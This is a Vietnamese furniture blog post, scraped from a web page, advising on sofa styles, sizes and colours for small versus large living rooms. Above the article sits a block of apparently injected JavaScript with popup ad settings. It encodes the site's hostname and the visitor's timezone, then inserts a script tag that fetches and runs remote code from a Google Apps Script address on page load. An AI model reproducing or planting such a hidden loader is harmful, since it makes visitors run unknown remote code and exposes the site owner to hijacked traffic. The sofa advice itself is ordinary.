var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

So sánh chọn sofa phòng khách đẹp cao cấp cho nhà nhỏ và rộng

Khi chọn sofa phòng khách đẹp cao cấp cho nhà nhỏ và nhà rộng sẽ có sự khác nhau. Vì diện tích khác nhau nên chọn kích thước, kiểu dáng sofa cũng cần phải chú ý.

Chúng ta hãy cùng tìm hiểu xem cách chọn sofa cho phòng khách với diện tích nhỏ và rộng khác nhau như thế nào nhé.

Chọn sofa phòng khách đẹp cao cấp cho nhà nhỏ

Với nhà nhỏ sẽ có diện tích khiêm tốn, không quá lớn. Chọn sofa cho nhà nhỏ cần phải cân nhắc về kích thước, kiểu dáng, phong cách cho đến màu sắc.

sofa phòng khách đẹp cao cấp
Chọn ghế sofa cho nhà nhỏ cần phải có sự cân nhắc

Với những căn phòng nhỏ thì các loại sofa góc kích thước nhỏ hay sofa văng chữ I, sofa đơn sẽ hợp nhất. Các loại sofa này có kích thước nhỏ sẽ dễ dàng để bố trí, tiết kiệm diện tích, tạo nên sự thông thoáng hơn. Và với sofa cho phòng khách nhỏ nên ưu tiên các gam màu sáng, nhẹ, trung tính. Sofa nên theo phong cách hiện đại, tối giản, trẻ trung sẽ hợp hơn với các loại sofa cổ điển. Chọn sofa da hay sofa vải cho phòng khách nhỏ đều sẽ phù hợp.

sofa phòng khách đẹp cao cấp
Căn phòng nhỏ sẽ hợp với các loại sofa góc nhỏ, sofa đơn, sofa văng chữ I

Chọn sofa phòng khách đẹp cao cấp cho nhà rộng

Những căn nhà rộng có diện tích thoải mái, chọn lựa sofa sẽ dễ dàng hơn với nhà nhỏ. Các căn phòng rộng thì các loại sofa văng bộ, sofa góc dạng chữ L lớn, chữ U sẽ phù hợp nhất.

sofa phòng khách đẹp cao cấp
Sofa cho phòng khách rộng nên chọn sofa góc lớn chữ L, sofa chữ U, sofa văng bộ


Sofa cao cấp
cho phòng khách lớn với các kiểu dáng kể trên sẽ tương xứng với diện tích, không tạo nên sự đơn điệu, lạc lỏng mà ngược lại đem đến giá trị thẩm mĩ cực cao, cực kì sang chảnh, thời thượng. Tùy theo kiến trúc không gian bạn có thể chọn lựa phong cách ghế sofa cho phù hợp. Với phòng khách lớn bạn chọn màu sắc sofa tùy ý muốn chỉ cần đảm bảo được sự hài hòa và cân đối nhất.

sofa phòng khách đẹp cao cấp
Sofa cho căn phòng lớn đảm bảo sự cân đối, hài hòa

Với phòng khách nhỏ và phòng khách lớn sẽ có sự chọn lựa sofa khác nhau. Và dù chọn lựa cho không gian nào thì tại Nội Thất Xinh cũng đều có đầy đủ các mẫu mã sofa cho bạn chọn lựa.